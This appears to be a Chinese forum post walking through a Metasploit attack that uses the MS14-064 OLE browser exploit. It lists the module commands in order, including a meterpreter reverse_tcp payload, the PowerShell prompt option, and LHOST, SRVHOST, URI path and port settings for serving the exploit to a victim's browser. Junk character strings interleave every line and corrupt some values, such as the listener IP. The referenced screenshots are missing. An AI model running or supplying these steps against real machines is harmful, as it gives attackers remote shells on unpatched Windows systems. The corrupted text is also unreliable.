- i0 x7 r* U+ ~/ C9 {, t- o
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
7 Y+ J1 A7 {, a- B9 r
8 q, S% C! I% z& y+ n! p: t; E0 O. h2 Q& F9 k, d0 a3 @/ b
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
! |8 F4 I- A3 l6 L6 l2 p/ M
% e/ V0 ~& I- h2 u4 v
1 w6 S2 O' u( }9 S
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
6 ~. i/ G% ^( ]5 I1 b7 \
# D5 _0 \. l+ N
' h/ X3 O2 j2 }! e8 I$ ?
set AllowPowershellPrompt true
/ t( ~% p/ I3 Q# {3 v: }) I0 k
3 j) Z- t# R/ z2 L5 h' M4 H
F1 l8 P% Z6 ]/ ~+ L! x Set LHOST 192.168.0.1097 X- J& \* i/ B6 J# Q' Q. W2 g" ?
& W5 X5 s; R/ @' f" ~3 O7 l
$ n ]1 ]( z, [3 G7 D ]
set SRVHOST 192.168.0.109
4 _7 H" X7 P% S; d( [* c
, n# z$ A% u C5 g% x* I1 T4 T& I+ G- _
Set uripath share8 M, o6 x1 `3 F. ~( H% i7 g- {
9 S' z7 r/ o# }2 B
5 @( h3 s; W1 Y# ]- b Set srvport 80
) N( z, m% ?6 U& H; N$ F1 o0 V
g+ Y$ H7 ^3 K$ u$ [1 H' Q
& A$ k* X7 C) `7 \, f3 ]
@( a5 j. Y0 x6 H
& S, `; ?2 ^* P( D" o6 q4 V
; z% o5 A; f2 M/ ~! Z ?
+ a8 {# X* b; Y, r& t1 o8 M0 K
- g/ [! E5 h# m+ Z7 \- r8 x1 I; ?3 b k# k- `: ]9 Z
& t& c* q- ]( h
$ s7 e) Z: _9 i, L, W* U; e
% q; y. J; @; ~, o0 s& e5 w% U
! f& F T" B7 S) [& ~4 C) }. H
2 Z/ Z" [( R; {5 P+ d* _4 X
2 T0 h2 C# V5 s0 O7 D) _) f
; p# q+ c7 E& {7 ]
! M+ G* t: G, b+ r2 ]
& j. H* X0 ?7 t8 h 下面我们来访问本地地址如图:( P$ s, r0 m- X* p5 \2 V/ E9 E9 J
$ }7 V; A9 l% W) Q! \# a
9 x/ w8 x: I1 {* r- `$ k+ P7 U) U 2 @9 t2 I; p$ Y* `; O
- |! V8 U6 n$ _0 g$ ]$ l9 g4 W
8 m, j! s p! ^5 V- T. d
+ U- P/ R. E1 y
- {) W/ w0 M6 b) a* O* `* t6 D! c4 A* |* V' R7 ~
8 g" G% k5 v8 L! h+ J, @